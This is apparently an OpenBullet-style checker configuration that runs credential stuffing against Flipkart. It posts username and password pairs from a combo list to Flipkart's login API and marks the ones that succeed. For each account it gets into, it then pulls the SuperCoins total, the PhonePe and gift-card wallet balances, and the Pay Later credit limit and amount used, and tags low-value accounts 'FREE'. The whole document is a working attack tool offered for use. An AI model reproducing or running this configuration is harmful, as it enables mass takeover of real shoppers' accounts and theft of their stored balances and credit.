[SETTINGS]
{
  "Name": "Flipkart Rendi ke liye",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-04-01T21:53:28.6141116-07:00",
  "AdditionalInfo": "",
  "Author": "T h o r",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#request_cookies REQUEST GET "https://www.flipkart.com" AutoRedirect=FALSE ReadResponseSource=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)" 

#login REQUEST POST "https://www.flipkart.com/api/4/user/authenticate" 
  CONTENT "{\"loginId\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)" 
  HEADER "X-user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) FKUA/website/41/website/Desktop" 

#key_check KEYCHECK 
  KEYCHAIN Success OR 
    KEY "authentication successful" 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "400" 

#Coins REQUEST POST "https://www.flipkart.com/api/4/page/fetch" 
  CONTENT "{\"pageUri\":\"/plus/coins-activity\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)" 
  HEADER "X-user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) FKUA/website/41/website/Desktop" 

#PARSEC PARSE "<SOURCE>" LR "\"text\":{\"type\":\"RichTextValue\",\"text\":\"" "\"" -> CAP "Coins" 

#GC/PP_GET REQUEST GET "https://www.flipkart.com/api/2/wallet/balance" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)" 
  HEADER "X-user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) FKUA/website/41/website/Desktop" 

#PP/GC PARSE "<SOURCE>" LR ",\"compartmentName\":\"Phonepe\"},{\"availableBalance\"" ",\"code\":true,\"compartmentName\":\"EGV\"}],\"" Recursive=TRUE -> VAR "GiftCard1" 

#PP/GC PARSE "<GiftCard1>" LR ":" ",\"blockedBalance\":" Recursive=TRUE -> CAP "GiftCard" 

#Paylater REQUEST GET "https://m.flipkart.com/api/1/fintech/loans?productType=FLIPKART_ADVANZ&t=1597483022584" 
  
  HEADER "Host: www.flipkart.com" 
  HEADER "Referer: https://www.flipkart.com/account/giftcard?link=home_giftcard" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36" 
  HEADER "X-user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 FKUA/website/41/website/Desktop" 

#Paylater PARSE "<SOURCE>" LR ",\"paylaterMaxLimit\":" ",\"" -> CAP "Paylater" "[" "]" 

#Usage PARSE "<SOURCE>" LR ",\"paylaterUsed\":" ",\"" -> CAP "Usage" "[" "]" 

FUNCTION Length "<Paylater>" -> VAR "1" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" AND 
    KEY "<1>" EqualTo "0" 
    KEY "<1>" LessThan "2" 
    KEY "<GiftCard>" EqualTo "0" 
    KEY "<GiftCard>" LessThan "1000" 

